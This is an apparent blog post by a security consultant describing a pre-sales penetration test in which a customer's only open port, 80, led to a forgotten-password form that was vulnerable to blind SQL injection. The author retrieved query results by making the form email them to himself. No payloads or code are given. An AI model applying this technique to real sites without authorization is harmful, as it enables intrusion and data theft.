One of our sales was going to sell vulnerability assessment / management solutions to a customer.
The customer was so confident of their server since they have nothing open to the Internet except the Port 80. Also, many of the vendors/SI already approached them and provided them many times of the scans already.
OK. Port 80.
It seems we don't have too much to do with a OS / services scanner. This test finally falls into a web application assessment.
Thus, I lanuched a Web Application Scanner to scan the server. There is nothing interesting except a form that was designnd to send a email for forgotten password. All of the forms in this web site was designned with the input validation checks, except this little pop up window. Then the SQL injection hacking was played.
The advanced skill in this case is that the result is not showing in the error message in the web browser. If your SQL statement was run, then it will send a email to notify the user for the forgotten password. So what I did is that I have to get the result by sending email to myself.
Agree or not. It seems the Penetration Test is somehow nothing much to test except the web testing for most of the cases. And the web testing is somehow nothing much to do except the input validation or you go straight to test the SQL injection problem.
The human mistakes in the application design give the hacker a happy venue to be success.
So, as long as the port 80 is still open, employ your expertise in Web Hacking, you are on the way.
